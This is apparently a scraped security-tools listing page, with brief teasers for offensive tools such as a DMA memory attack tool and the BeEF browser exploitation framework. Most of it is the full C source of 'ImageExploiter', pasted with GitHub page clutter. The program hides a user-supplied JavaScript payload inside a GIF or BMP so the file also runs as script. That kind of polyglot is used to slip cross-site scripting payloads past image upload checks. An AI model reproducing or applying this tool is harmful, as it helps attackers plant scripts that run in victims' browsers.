
Update 12-01.2015: for Caveats section [OS X > 10.7.2] [6] and [Windows > 8.1] [7] Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The…

Note: For educational use only Requirments: To run the server you will need to have pyftpdlib installed Intro: Peca was designed to help collect key…

change v-0.5 (MAJOR RELEASE): – Web app attacks-Added $gt no value attack for PHP/ExpressJS applications. Thanks go to Petko D. Petkov for this one! –…

You can hide your JS payload inside a gif or bmp image. Source Code :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 |
Skip to content This repository Explore Gist Blog Help 0xc0de 0x0mar 1 Watch Star 1 Fork 2OsandaMalith/ImageExploiter branch: master ImageExploiter/imgexploiter.c Osanda Malith JayathissaOsandaMalith 12 hours ago Update imgexploiter.c 1 contributor 141 lines (116 sloc) 4.534 kb RawBlameHistory #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <sys/stat.h> #define MAX 500 /* The MIT License (MIT) Copyright (c) 2014 Osanda Malith Jayathissa Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Author: Osanda Malith Jayathissa E-Mail: osanda[cat]unseen.is Description: You can hide your JS payload inside a gif or bmp image. Write-up: http://osandamalith.wordpress.com/2014/11/13/js-via-images/ Disclaimer: Author takes no responsibility of any damage you cause. Use this for educational purposes only. */ void inject(char *payload, char *fname, char *format) { int src, dst; int firstTimeIn; char myPreviousChar; char myCurrentChar; char newFilename[MAX]; strcpy(newFilename, fname); if (!strcmp(format, "gif")) strcat(newFilename, "_exploit.gif"); else if (!strcmp(format, "bmp")) strcat(newFilename, "_exploit.bmp"); else { printf("[-] Invalid File Format\n"); exit(0); } #ifdef _WIN32 src = open(fname, O_RDONLY | O_BINARY, 0); dst = open(newFilename, O_CREAT | O_TRUNC | O_WRONLY | O_BINARY, S_IREAD | S_IWRITE); #elif __unix__ src = open(fname, O_RDONLY, 0); dst = open(newFilename, O_CREAT | O_TRUNC | O_WRONLY, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH); #endif firstTimeIn = 1; while (read(src, &myCurrentChar, 1)) { if (firstTimeIn == 1) { firstTimeIn = 0; myPreviousChar = myCurrentChar; } else { if (((myPreviousChar == 0x2A) && (myCurrentChar == 0x2F)) \ || ((myPreviousChar == 0x2F) && (myCurrentChar == 0x2A))) { myPreviousChar = 0x00; myCurrentChar = 0x00; } write(dst, &myPreviousChar, 1); myPreviousChar = myCurrentChar; } } write(dst, &myPreviousChar, 1); if(!strcmp(format, "gif")) lseek(dst, 6, SEEK_SET); else lseek(dst, 2, SEEK_SET); write(dst, "\x2F", 1); write(dst, "\x2A", 1); close(src); close(dst); #ifdef _WIN32 dst = open(newFilename, O_WRONLY | O_APPEND | O_BINARY, 0); #elif __unix__ dst = open(newFilename, O_WRONLY | O_APPEND, 0); #endif write(dst, "\x2A", 1); write(dst, "\x2F", 1); write(dst, "\x3D", 1); write(dst, "\x31", 1); write(dst, "\x3B", 1); write(dst, payload, strlen(payload)); write(dst, "\x3B", 1); close(dst); printf("\n[+] Successfully written to %s\n", newFilename); } int main(int argc, char *argv[]) { int i; char *fileName; char *format; char *payloadString; printf(" _____ \n"); printf("| |_____ ___ ___ ___ \n"); printf("|- -| | .'| . | -_|\n"); printf("|_____|_|_|_|__,|_ |___|\n"); printf(" |___| \n"); printf("\t _____ _ ___ _ _ \n"); printf("\t| __|_ _ ___| | |_| |_ ___ ___ \n"); printf("\t| __|_'_| . | | | | | _| -_| _|\n"); printf("\t|_____|_,_| _|_|___|_|_| |___|_| \n"); printf("\t |_| \n"); printf("\n[~] Author: Osanda Malith Jayathissa\n[~] Website: http://OsandaMalith.wordpress.com\n[~] E-Mail: osanda[cat]unseen.is\n"); if (argc != 7) { printf("\n[-] Usage: %s -i <image file name> -f <gif or bmp> -p <payload string> \n", argv[0]); return 1; } for (i = 1; i < argc; i++) { if (!strcmp(argv[i], "-i")) fileName = argv[i+1]; if (!strcmp(argv[i], "-f")) format = argv[i+1]; if (!strcmp(argv[i], "-p")) payloadString = argv[i+1]; } inject(payloadString, fileName, format); return 0; } /*EOF*/ Status API Training Shop Blog About © 2015 GitHub, Inc. Terms Privacy Security Contact |
Download : Master.zip | Clone Url Source: https://osandamalith.wordpress.com/2014/11/13/js-via-images/

intelengine aims to be an information gathering and exploitation architecture, it is based on the use of transforms, that convert one data type into another….

Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux, but in difference this python script will have provide more flexibility…

A. CONFIGURATION 1) Postgresql ensure postgresql 9.3 is installed configure postgresql and nidus db sudo apt-get install postgresql-9.3-postgis-2.1 sudo -u postgres psql CREATE EXTENSION adminpack;…

The Browser Exploitation Framework (BeEF) is a powerful professional security tool. BeEF is pioneering techniques that provide the experienced penetration tester with practical client side…